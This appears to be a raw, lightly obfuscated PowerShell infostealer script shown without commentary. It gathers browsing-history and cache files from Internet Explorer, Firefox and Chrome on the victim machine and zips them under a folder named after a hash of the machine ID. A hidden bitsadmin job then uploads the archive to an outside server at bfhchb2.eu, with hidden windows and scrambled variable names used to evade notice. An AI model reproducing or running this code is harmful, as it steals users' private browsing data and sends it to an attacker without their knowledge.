$krgujhas='/C bitsadmin /reset'; start-process -wiNdowStylE HiDden cmd.exe $krgujhas; $comID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ; $comP=$comID.Substring(0,6); $fp=$env:userprofile+'\AppData'; $hPath=$fp+'\Roaming\'+$comP; [Reflection.Assembly]::LoadWithPartialName("System.Web") $hMD5=[System.Web.Security.FormsAuthentication]::HashPasswordForStoringInConfigFile($comID+$env:ComputerName, "MD5").tolower() $hFile=$hPath+'\'+$hMD5+'.tmp'; $zipFN = $hPath+'\'+$hMD5+'.zip' If(!(test-path $hPath)){New-Item -ItemType Directory -Force -Path $hPath} try{ Remove-Item $hFile}catch{} try{ Remove-Item $zipFN}catch{} $iel=Get-ChildItem -Path $fp'\Local\Microsoft\Internet Explorer\Recovery\Last Active\' -Filter "*.dat" -Recurse -ErrorAction SilentlyContinue -Force $ief=Get-ChildItem -Path $fp'\Local\Microsoft\Internet Explorer\Indexed DB\' -Filter "*.log" -Recurse -ErrorAction SilentlyContinue -Force $ier=Get-ChildItem -Path $fp'\Local\Microsoft\Windows\WebCache' -Filter "*.log" -Recurse -ErrorAction SilentlyContinue -Force $ff=Get-ChildItem -Path $fp'\Roaming' -Filter places.sqlite -Recurse -ErrorAction SilentlyContinue -Force $chrome=Get-ChildItem -Path $fp'\Local\Google' -Filter History -Recurse -ErrorAction SilentlyContinue -Force try{ for ($i=0; $i -le $iel.length; $i++){ try{Get-Content $iel[$i].fullname | out-file -append $hFile}catch {} } }catch {} try{ for ($i=0; $i -le $ief.length; $i++){ try{Get-Content $ief[$i].fullname | out-file -append $hFile}catch {} } }catch {} try{ for ($i=0; $i -le $ier.length; $i++){ try{Get-Content $ier[$i].fullname | out-file -append $hFile}catch {} } }catch {} try{ Get-Content $ff.fullname | out-file -append $hFile }catch {} try{ Get-Content $chrome.fullname | out-file -append $hFile }catch {} Add-Type -assembly 'System.IO.Compression' Add-Type -assembly 'System.IO.Compression.FileSystem' [System.IO.Compression.ZipArchive]$ZipFile = [System.IO.Compression.ZipFile]::Open($zipFN,([System.IO.Compression.ZipArchiveMode]::Create)) [System.IO.Compression.ZipFileExtensions]::CreateEntryFromFile($ZipFile, $hFile, (Split-Path $hFile -Leaf)) $ZipFile.Dispose() try{Remove-Item $hFile}catch{} $tgervg= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_}); $hrefefr='/C bitsadmin /transfer '+$tgervg+' /upload "https://bfhchb2.eu/zu.php?s='+$hMD5+'&m='+$hMD5+'" "'+$zipFN+'"'; $hrefefr; start-process -wiNdowStylE hidden cmd.exe $hrefefr;